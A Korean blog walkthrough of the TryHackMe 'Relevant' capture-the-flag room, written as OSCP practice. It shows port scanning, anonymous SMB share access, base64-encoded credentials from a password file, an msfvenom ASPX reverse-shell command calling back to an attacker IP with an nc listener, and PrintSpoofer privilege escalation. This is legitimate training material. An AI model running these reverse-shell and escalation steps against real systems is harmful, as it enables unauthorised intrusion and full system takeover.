TryHackMe | Relevant - OSCP 챌린지

TASK 1 Pre-Engagement Briefing

 

TASK 1 설명을 해석하자면

 

고객이 생산 환경 출시를 일주일 앞두고 침투 테스트를 요청했습니다. 다음과 같은 작업 범위가 있습니다:

• 제공된 가상 환경에 대한 평가를 수행해야 합니다.
• 최소한의 정보를 제공하며, 공격자의 관점(블랙박스 테스트)에서 진행해야 합니다.
• 두 개의 플래그(User.txt, Root.txt)를 확보해야 합니다.
• 수동적 공격을 우선적으로 시도하며, 모든 취약점을 찾아 기록해야 합니다.
• 발견된 플래그를 대시보드에 제출해야 하며, 오직 할당된 IP 주소만 범위 내에 포함됩니다.
• 모든 취약점을 찾아보고 보고해야 합니다.

OSCP 시험 규칙처럼 되어있다

 

이번 CTF 로 공부좀 빡세게 해야겠다

 

PortScan

nmap -sV -sC -A 10.10.123.157

 

nmap 부터 돌려주겠습니다

 

출력내용

135/tcp  open  msrpc         Microsoft Windows RPC

80/tcp   open  http          Microsoft IIS httpd 10.0

139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn

445/tcp  open  microsoft-ds  Windows Server 2016 Standard Evaluation 14393 microsoft-ds

3389/tcp open  ms-wbt-server Microsoft Terminal Services

 

현재 윈도우 서버 2016  보입니다

 

제가 예상하기론 msfvenom 을 활용할거 같네요

 

웹 페이지에 들어가보겠습니다

 

 

윈도우 서버 페이지군요

 

별다른건 없는거같으니 경로 탐색을 하겠습니다

gobuster dir -u http://10.10.123.157/ -w '/home/kali/Downloads/directory-list-2.3-medium.txt'

 

 

너무 느려서 -t 메뉴로 스레드를 설정하겠습니다

gobuster dir -u http://10.10.123.157/ -w '/home/kali/Downloads/directory-list-2.3-medium.txt' -t 50

 

 

gobuster 에 나온 경로로 모두 들어가봤는데 

 

 

서버 에러가 뜬다

 

그말은 아무것도 찾지를 못했다는것이다 :(

 

smbclient 로 로그인해보자

 

smbclient -L 10.10.123.157

 

연결에 실패했다 뜬다

 

무슨 이유로 연결에 실패한건지 알아보겠다

 

전에 포트스캔을 했을떄 전체 포트스캔을 안해서

 

빼먹은 포트가 있는거 같다

 

그래서 그 포트 경로로 진입해야 될거같다

nmap -p- 10.10.123.157

 

출력 내용

49663/tcp open

49667/tcp open

49669/tcp open

 

다시 49663 으로 경로를 진입해보겠습니다

 

저게 맞는거였네요

 

 

아까 smbclient 로그인할떄

nt4wrksv

 

해당 컴퓨터에 nt4wrsksv 가 활성되고 있는거같습니다

 

로그인을 해보겠습니다

smbclient \\\\10.10.42.198\\nt4wrksv

 

오 성공적으로 로그인이 되였습니다

 

 

get password.txt

 

get 으로 해당 서버에 있는 텍스트 파일을 받아줍시다

 

 

Qm9iIC0gIVBAJCRXMHJEITEyMw==
QmlsbCAtIEp1dzRubmFNNG40MjA2OTY5NjkhJCQk

 

base64 로 인코딩된 문자열을 확인할수가 있습니다

 

https://www.base64decode.org/

Base64 Decode and Encode - Online

 

base64 디코딩 사이트에서 크랙해줬습니다

 

msfvenom

 

aspx 파일 형식으로된 악성파일을 만들어줍니다

msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.21.35.246 LPORT=4444 -f aspx -o shell.aspx

nc -lvnp 4444

 

리스너 설정후

 

다시 smb 로 돌아가서

 

 

 

put relevant.aspx

 

smb 에 저장후

 

 

 

성공적으로 쉘을 얻었습니다

 

 

 

아까 base64 로 크랙해줬던 bob 이 보입니다

 

Desktop 으로 경로를 이동해 

 

user.txt 플레그를 얻어봅시다

 

 

type user.txt

 

성공적으로 플레그를 얻었습니다

 

Root.txt

 

Priv/ 명령어로 Privilege Name 을 확인해봤습니다

 

SeImpersonatePrivilege

 

현재 이게 Enabled 체크가 되여있는데

 

이를 PrintSpoofer 를 이용하여 모든 권한을 탈취할수가 있습니다

 

https://github.com/dievus/printspoofer

GitHub - dievus/printspoofer

 

 

exe 파일을 다운로드 받아 smb 로 옮겨줍니다

 

 

nt4wrksv smb 파일로 경로를 이동해준후

cd c:\inetpub\wwwroot\nt4wrksv

 

확인하면 PrintSpoofer.exe 가 저장되여있는걸 확인할수 있습니다

 

 

깃헙에 그대로 올려져 있는 

 

 

따라 쳐보겠습니다

 

 

faild 가 나오면서 타임아웃이라 하네요

 

TroubleShooting

재시도 해보겠습니다

 

성공적으로 윈도우 시스템에 쉘을 탈취 했습니다

 

관리자 경로로 진입해보겠습니다

 

 

성공적으로 마지막 플레그를 획득했습니다 !

 

 

난이도 : 5/10

걸린시간 : 2시간 30분

한줄평 : OSCP 공부하실떄 강추 !